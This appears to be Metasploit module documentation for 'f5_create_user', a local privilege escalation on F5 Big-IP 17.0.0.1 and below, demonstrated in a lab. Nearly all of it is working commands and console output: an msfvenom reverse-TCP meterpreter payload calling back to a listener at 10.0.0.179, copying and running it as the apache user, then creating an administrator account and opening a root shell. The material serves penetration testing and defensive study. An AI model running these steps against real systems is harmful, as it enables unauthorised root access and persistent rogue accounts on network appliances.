## Vulnerable Application The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be downloaded as a VMWare image for free (you have to create an account) from https://downloads.f5.com. You can register for a free 30-day trial if you like, but it's not required to test this. Boot the VM and set an admin password by logging in with the default credentials (admin / admin). You'll need that password. ## Verification Steps 1. Install the application 2. Start `msfconsole` 3. Do: Get a non-root session somehow (eg: `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp` then `./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 /bin/bash << EOF chmod +x /tmp/testexploit.elf sudo -u apache /tmp/testexploit.elf EOF`) 4. Do: `use exploit/linux/local/f5_create_user` 5. Do `set SESSION ` 6. Do: `run` 7. You should get a session ## Options ### `USERNAME` / `PASSWORD` The username and final password for the account. If blank, they'll be randomly generated. ### `CREATE_SESSION` If set (which is default), will spawn a root session. Otherwise, simply creates the account. ## Scenarios ### F5 Big-IP 17.0.0.1 - Create a session with random creds First, get a non-root session however you can. You can use a `multi/handler` and `msfvenom`: ``` msf > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp PAYLOAD => linux/x64/meterpreter_reverse_tcp msf exploit(multi/handler) > set LHOST 10.0.0.179 LHOST => 10.0.0.179 msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.0.179:4444 [*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:34140) at 2022-11-14 15:59:49 -0800 [...run the payload...] meterpreter > getuid Server username: apache meterpreter > bg msf exploit(multi/handler) > setg SESSION 1 SESSION => 1 ``` To create and run the payload, in another window: ``` $ ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && chmod +x testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 1068640 bytes Final size of elf file: 1068640 bytes testexploit.elf ``` Now that we have a session, we can just run the module: ``` msf exploit(multi/handler) > use exploit/linux/local/f5_create_user [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp msf exploit(linux/local/f5_create_user) > exploit [*] Started reverse TCP handler on 10.0.0.179:4444 [*] Will attempt to create user 7yI5vLIK / woquVd36PhcG, then change password to 9d9s83bBPwu5 when creating a session [+] Service didn't return an error, so user was likely created! [*] Attempting create a root session... [*] Sending stage (40168 bytes) to 10.0.0.162 [*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:45254) at 2022-11-14 16:02:10 -0800 meterpreter > getuid Server username: root ``` ### F5 Big-IP 17.0.0.1 - Create a session with set creds Create a session as shown above, then: ``` msf exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser USERNAME => mymsfdemouser msf exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword PASSWORD => mybigmsfdemopassword msf exploit(linux/local/f5_create_user) > set VERBOSE true VERBOSE => true msf exploit(linux/local/f5_create_user) > exploit [*] Started reverse TCP handler on 10.0.0.179:4444 [*] Will attempt to create user mymsfdemouser / QVEE0pqM7pAd, then change password to mybigmsfdemopassword when creating a session [*] Hashing the password with a pseudorandom salt [+] Service didn't return an error, so user was likely created! [*] Attempting create a root session... [*] Sending stage (40164 bytes) to 10.0.0.162 [*] Output from su command: Password: You are required to change your password immediately (root enforced) (current) BIG-IP password: New BIG-IP password: Retype new BIG-IP password: Changing password for mymsfdemouser. [*] Meterpreter session 3 opened (10.0.0.179:4444 -> 10.0.0.162:49646) at 2022-11-14 16:03:04 -0800 meterpreter > getuid Server username: root ``` ### F5 Big-IP 17.0.0.1 - Just create an account with random creds Get a session as shown above, then: ``` msf exploit(linux/local/f5_create_user) > set CREATE_SESSION false CREATE_SESSION => false msf exploit(linux/local/f5_create_user) > exploit [*] Started reverse TCP handler on 10.0.0.179:4444 [*] Will attempt to create user hKjGGrlU / yRQijFQjVjqa [*] Hashing the password with a pseudorandom salt [+] Service didn't return an error, so user was likely created! ^C[*] Exploit completed, but no session was created. ``` ### F5 Big-IP 17.0.0.1 - Just create an account with set creds Get a session as shown above, then: ``` msf exploit(linux/local/f5_create_user) > set CREATE_SESSION false CREATE_SESSION => false msf exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser2 USERNAME => mymsfdemouser2 msf exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword PASSWORD => mybigmsfdemopassword msf exploit(linux/local/f5_create_user) > exploit [*] Started reverse TCP handler on 10.0.0.179:4444 [*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword [*] Hashing the password with a pseudorandom salt [+] Service didn't return an error, so user was likely created! ^C[*] Exploit completed, but no session was created. ``` ### F5 Big-IP 17.0.0.1 - Create an account with an error Get a session as shown above, then (we use a duplicate username): ``` [*] Started reverse TCP handler on 10.0.0.179:4444 [*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword [*] Hashing the password with a pseudorandom salt [-] mcp query returned an error message: 01020066:3: The requested user (mymsfdemouser2) already exists in partition Common. (code: 16908390) ```